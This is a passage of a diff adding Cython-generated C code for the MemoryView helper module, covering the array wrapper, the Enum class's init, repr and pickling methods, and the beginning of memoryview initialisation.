__pyx_t_4); + __Pyx_INCREF(__pyx_v_mode); + __Pyx_GIVEREF(__pyx_v_mode); + PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_mode); + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_allocate_buffer, Py_False) < 0) __PYX_ERR(1, 275, __pyx_L1_error) + __pyx_t_3 = ((PyObject *)__pyx_tp_new_array(((PyTypeObject *)__pyx_array_type), __pyx_t_1, __pyx_t_4)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_result = ((struct __pyx_array_obj *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":276 + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) + * result.data = buf # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_v_result->data = __pyx_v_buf; + } + __pyx_L3:; + + /* "View.MemoryView":278 + * result.data = buf + * + * return result # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "View.MemoryView":268 + * + * @cname("__pyx_array_new") + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): # <<<<<<<<<<<<<< + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.array_cwrapper", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XDECREF(__pyx_v_mode); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":304 + * cdef class Enum(object): + * cdef object name + * def __init__(self, name): # <<<<<<<<<<<<<< + * self.name = name + * def __repr__(self): + */ + +/* Python wrapper */ +static int __pyx_MemviewEnum___init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_MemviewEnum___init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_name = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 304, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(1, 304, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + } + __pyx_v_name = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 304, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.Enum.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self), __pyx_v_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v_name) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__", 0); + + /* "View.MemoryView":305 + * cdef object name + * def __init__(self, name): + * self.name = name # <<<<<<<<<<<<<< + * def __repr__(self): + * return self.name + */ + __Pyx_INCREF(__pyx_v_name); + __Pyx_GIVEREF(__pyx_v_name); + __Pyx_GOTREF(__pyx_v_self->name); + __Pyx_DECREF(__pyx_v_self->name); + __pyx_v_self->name = __pyx_v_name; + + /* "View.MemoryView":304 + * cdef class Enum(object): + * cdef object name + * def __init__(self, name): # <<<<<<<<<<<<<< + * self.name = name + * def __repr__(self): + */ + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":306 + * def __init__(self, name): + * self.name = name + * def __repr__(self): # <<<<<<<<<<<<<< + * return self.name + * + */ + +/* Python wrapper */ +static PyObject *__pyx_MemviewEnum___repr__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_MemviewEnum___repr__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + __pyx_r = __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(struct __pyx_MemviewEnum_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "View.MemoryView":307 + * self.name = name + * def __repr__(self): + * return self.name # <<<<<<<<<<<<<< + * + * cdef generic = Enum("") + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->name); + __pyx_r = __pyx_v_self->name; + goto __pyx_L0; + + /* "View.MemoryView":306 + * def __init__(self, name): + * self.name = name + * def __repr__(self): # <<<<<<<<<<<<<< + * return self.name + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_MemviewEnum_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_MemviewEnum_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_MemviewEnum___reduce_cython__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_MemviewEnum___reduce_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self) { + PyObject *__pyx_v_state = 0; + PyObject *__pyx_v__dict = 0; + int __pyx_v_use_setstate; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":5 + * cdef object _dict + * cdef bint use_setstate + * state = (self.name,) # <<<<<<<<<<<<<< + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_self->name); + __Pyx_GIVEREF(__pyx_v_self->name); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_self->name); + __pyx_v_state = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "(tree fragment)":6 + * cdef bint use_setstate + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) # <<<<<<<<<<<<<< + * if _dict is not None: + * state += (_dict,) + */ + __pyx_t_1 = __Pyx_GetAttr3(((PyObject *)__pyx_v_self), __pyx_n_s_dict, Py_None); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v__dict = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":7 + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + __pyx_t_2 = (__pyx_v__dict != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":8 + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + * state += (_dict,) # <<<<<<<<<<<<<< + * use_setstate = True + * else: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v__dict); + __Pyx_GIVEREF(__pyx_v__dict); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v__dict); + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_state, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_state, ((PyObject*)__pyx_t_3)); + __pyx_t_3 = 0; + + /* "(tree fragment)":9 + * if _dict is not None: + * state += (_dict,) + * use_setstate = True # <<<<<<<<<<<<<< + * else: + * use_setstate = self.name is not None + */ + __pyx_v_use_setstate = 1; + + /* "(tree fragment)":7 + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + goto __pyx_L3; + } + + /* "(tree fragment)":11 + * use_setstate = True + * else: + * use_setstate = self.name is not None # <<<<<<<<<<<<<< + * if use_setstate: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + */ + /*else*/ { + __pyx_t_2 = (__pyx_v_self->name != Py_None); + __pyx_v_use_setstate = __pyx_t_2; + } + __pyx_L3:; + + /* "(tree fragment)":12 + * else: + * use_setstate = self.name is not None + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + */ + if (__pyx_v_use_setstate) { + + /* "(tree fragment)":13 + * use_setstate = self.name is not None + * if use_setstate: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state # <<<<<<<<<<<<<< + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_pyx_unpickle_Enum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_136983863); + __Pyx_GIVEREF(__pyx_int_136983863); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_136983863); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_1, 2, Py_None); + __pyx_t_4 = PyTuple_New(3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_v_state); + __pyx_t_3 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "(tree fragment)":12 + * else: + * use_setstate = self.name is not None + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + */ + } + + /* "(tree fragment)":15 + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_pyx_unpickle_Enum); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_136983863); + __Pyx_GIVEREF(__pyx_int_136983863); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_136983863); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_state); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_4 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + } + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.Enum.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_state); + __Pyx_XDECREF(__pyx_v__dict); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":16 + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_MemviewEnum_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_MemviewEnum_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 16, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 16, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 16, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.Enum.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_MemviewEnum_2__setstate_cython__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_MemviewEnum_2__setstate_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":17 + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle_Enum__set_state(self, __pyx_state) # <<<<<<<<<<<<<< + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 17, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle_Enum__set_state(__pyx_v_self, ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.Enum.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":349 + * cdef __Pyx_TypeInfo *typeinfo + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): # <<<<<<<<<<<<<< + * self.obj = obj + * self.flags = flags + */ + +/* Python wrapper */ +static int __pyx_memoryview___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_memoryview___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_obj = 0; + int __pyx_v_flags; + int __pyx_v_dtype_is_object; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_obj,&__pyx_n_s_flags,&__pyx_n_s_dtype_is_object,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_obj)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_flags)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 2, 3, 1); __PYX_ERR(1, 349, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dtype_is_object); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(1, 349, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_obj = values[0]; + __pyx_v_flags = __Pyx_PyInt_As_int(values[1]); if (unlikely((__pyx_v_flags == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + if (values[2]) { + __pyx_v_dtype_is_object = __Pyx_PyObject_IsTrue(values[2]); if (unlikely((__pyx_v_dtype_is_object == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + } else { + __pyx_v_dtype_is_object = ((int)0); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 2, 3, __pyx_nargs); __PYX_ERR(1, 349, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_obj, __pyx_v_flags, __pyx_v_dtype_is_object); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj, int __pyx_v_flags, int __pyx_v_dtype_is_object) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + Py_intptr_t __pyx_t_4; + size_t __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "View.MemoryView":350 + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): + * self.obj = obj # <<<<<<<<<<<<<< + * self.flags = flags + * if type(self) is memoryview or obj is not None: + */ + __Pyx_INCREF(__pyx_v_obj); + __Pyx_GIVEREF(__pyx_v_obj); + __Pyx_GOTREF(__pyx_v_self->obj); + __Pyx_DECREF(__pyx_v_self->obj); + __pyx_v_self->obj = __pyx_v_obj; + + /* "View.MemoryView":351 + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): + * self.obj = obj + * self.flags = flags # <<<<<<<<<<<<<< + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + */ + __pyx_v_self->flags = __pyx_v_flags; + + /* "View.MemoryView":352 + * self.obj = obj + * self.flags = flags + * if type(self) is memoryview or obj is not None: # <<<<<<<<<<<<<< + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + */ + __pyx_t_2 = (((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self))) == ((PyObject *)__pyx_memoryview_type)); + if (!__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_obj 